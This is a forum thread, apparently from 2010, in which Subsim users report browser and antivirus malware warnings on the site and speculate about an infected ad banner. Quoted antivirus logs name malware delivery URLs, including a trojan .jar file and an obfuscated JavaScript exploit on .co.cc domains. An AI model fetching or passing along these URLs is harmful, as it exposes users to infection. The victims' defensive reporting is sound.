We got a thread about these trojans here (http://www.subsim.com/radioroom/showthread.php?t=175495&page=8). (Probably a good idea to rename the title to something trojan something :hmmm:)

That's now 3rd trojan that people have reported. Neal's two (expensive :O:) experts have scanned SS and found nothing.

Avast doesn't seem to recognise anything coming from the url you mentioned, seems like the account have been suspended so might be it just warns you as it has been a trojan site in the past. Firefox recognises the site as potentially harmful, tho.

Ahh okay thanks Dowly for the update. I clicked back in this link and got blocked :dead: lol. I will have to either turn off malwarebytes before i come into subsim or answer "proceed anyway" on every link i enter so Malwarebytes will recognise not to block me everytime.

Oh well good to know. :salute:

I'm running the free version and every time I've been here since last week it blocks a Trojan. As this is a site that take this sort of thing seriously I tend to think its more likely a false positive.

I got a virus alert when opening a pm this morning. ii.m running avg.

I'm running the free version and every time I've been here since last week it blocks a Trojan. As this is a site that take this sort of thing seriously I tend to think its more likely a false positive.

You sure you have the free version Steed, free version doesn't monitor your internet activities thats why I went full to unlock it. You probably have full version.

just realised Malewarebtyes only kicks in and complains about subsim when Im using chrome - when im using firefox malewarebtyes doesn't complain about this site.:hmmm: weird.

I'm having the exact same issue with Chrome but no alerts with IE. What's going on?

You sure you have the free version Steed

Yep...but a boo boo by me. :oops:

Its my free Avast that has been alerting me.

After some weeks with out noting, another AV warning when entering the forum.
http://img69.imageshack.us/img69/5488/92402498.jpg (http://img69.imageshack.us/i/92402498.jpg/)

From the log: 17-10-2010 14:16:52 HTTP filter file http://vcfrt.com/01/vuujumsp/ksa.jar a variant of Java/Agent.A trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\java.exe.

The java console pop up also.

Using NOD32!

Started getting the red screen notifying that Subsim might be harmful site etc.
This what the google diagnostic page says (partly translated from finnish):
What happened when Google visited this site?
- During the past 90 days 401 pages were tested (at Subsim/radioroom) from which 14 pages loaded an malicious software without the permission from the user. Google visited this page the last time on 2010-10-18 and suspicious content was found on 2010-10-18.
Malicious software includes 9 exploit(s), 7 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software was found coming from 5 different networks, such as tyqudaf.co.cc/, vifyxoq.co.cc/, rrcch.com/.

Also, none of the smileys and the buttons for bold/italic text, quotes, hyperlinks etc. are working atm.

PS. I only get this with Firefox, IE still works and gives no warning about the site for some reason. :hmmm:

EDIT: Might add that Avast isn't actually spotting any trojans when I get this 'attack site' warning.

In addition to getting alerts from Malwarebytes and Chrome, Google is now reporting the following:

What happened when Google visited this site?
Of the 401 pages we tested on the site over the past 90 days, 14 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-10-18, and the last time suspicious content was found on this site was on 2010-10-18.Malicious software includes 9 exploit(s), 7 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 5 domain(s), including tyqudaf.co.cc/ (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=tyqudaf.co.cc/&client=googlechrome&hl=en-US), vifyxoq.co.cc/ (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=vifyxoq.co.cc/&client=googlechrome&hl=en-US), rrcch.com/ (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=rrcch.com/&client=googlechrome&hl=en-US).
This site was hosted on 1 network(s) including AS21844 (THEPLANET) (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:21844&client=googlechrome&hl=en-US).

I have got Opera installed that seems to run with no problems. Also having issues with Firefox and that warning message so I will be swapping browsers for a while. This is the second time around for me.

Google Chrome just told me twice that "this site appears to be hosting malware"
just a heads up.

http://www.subsim.com/radioroom/showthread.php?t=176196

We got atleast 3 threads about this already.
Just a heads up. :03:

I have got Opera installed that seems to run with no problems. Also having issues with Firefox and that warning message so I will be swapping browsers for a while. This is the second time around for me.

Yes, the Virus warning Problem goes on (with Firefox for example), look here:

http://img69.imageshack.us/img69/8190/bild119l.jpg (http://img69.imageshack.us/i/bild119l.jpg/)

http://img32.imageshack.us/img32/2086/bild120fh.jpg (http://img32.imageshack.us/i/bild120fh.jpg/)


Is it not possible to solve the problem?

Best regards,
Magic

We got atleast 3 threads about this already.
Just a heads up. :03:

Yes, it's like the malware and so, they spread...:D

Any way to increase the post count. :haha:

Any way to increase the post count. :haha:

+1 http://www.subsim.com/radioroom/picture.php?albumid=258&pictureid=2293

Nothing is impossible, only highly improbable. (Adam Savage) :know:

Cross your fingers and hope for the best. :)

While this forum loads, the top right banner of "Iron-Clads" load data from the developer site totemgames.ru. That side is hosted on IP: 195.208.0.15 and 195.208.0.15 is often listed on several maleware-site lists.

Don't think it's that. There's plenty of legit sites there too. Besides, AV's would go crazy if something was coming from there.

I was directed to this link

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.subsim.com/radioroom/showthread.php?t=129059

Title says it all. Firefox is telling me this site's been listed as an attack site. The hell? Was the site hacked or something recently?


I'm rather confused.

Haven't heard or seen anything, my guess is it's on your end, software or possible spamware, ect. Doubt a virus is going on, but check it. Many times sites will place crap in your PC telling you your under attack, getting a virus, ect, prompting you to use whatever program they have showing your problems, beware....Use a good free virus/spamware software like Avast.

So, I can't say, try rebooting your browser and see what happens

While this forum loads, the top right banner of "Iron-Clads" load data from the developer site totemgames.ru.

It don't loads data from totemgames.ru but the banner here has a link to totemgames.ru and Firefox, IE8 and other browsers running in safe-mode checks all links on a website whether they refer to an unsafe classified IP.

You are right, totemgames.ru refers to IP 195.208.0.15 and this IP is momentary blacklisted.

If i running Malwarebytes 1.46 with active web-check on and click on this link: http://www.totemgames.ru
the connection is blocked and reported as unsafe site

Me too, this time I'm not just getting the single trojan report I had a couple of weeks ago, I'm getting what others got which is blocking every single page.

http://farm5.static.flickr.com/4084/5096630674_2255b52360_b.jpg

http://farm5.static.flickr.com/4145/5096033849_3109052834_b.jpg

I'm using Firefox 3.6.10, McAfee VirusScan 8.7.0i, and the latest free versions of SuperAntiSpyware and Malwarebytes. All of which I'm now going to use :nope:

I"m getting the same "attack site" warning from Firefox.

Check the General Topics forum, its happening to everyone using Firefox or Google Chrome.

:yep:

There are now five or six threads on this now in various parts of the forum.

And an announcment from Neal!

Keep calm Captain Mainwaring!

@Seeadler, For now, I've changed the Ironclads link to a google search result for Totem games. I'm pretty sure Totem is 100% safe and legit, but the connection to a Russian IP may be causing this mess.

Today when visiting subsim.com (main page) I got a warning saying:

Accessed file is infected
Threat was blocked!
File name: clickfiles.co.cc/download/js.php
Threat name: Exploit JavaScript Obfuscation (type 1512)Browser: Firefox
AV: AVG Free

I got this same warning a while back too (about a week ago I guess) and haven't had it again until now, so I don't think it's got anything to do with subsim itself. I suspect something in the ads:

The ad that currently shows up in the top right corner is the Ironclads one. While reviewing the source code for the main page, I found out that the image loads from http://www.subsim.com/radioroom/images/TotemGames_Ironclads_banner_468x60.png. Every time I open this link in firefox, instead of the image I get an AV warning (the "Reported Attack Page" one that everyone is showing). IE just loads the image without any warnings. Don't know if my IE has got an AVG extension though.


EDIT: I'm getting this problem 50% of the time I visit any subsim page now! This is getting really annoying!

For future posts, please use this thread
http://www.subsim.com/radioroom/showthread.php?t=175495&page=10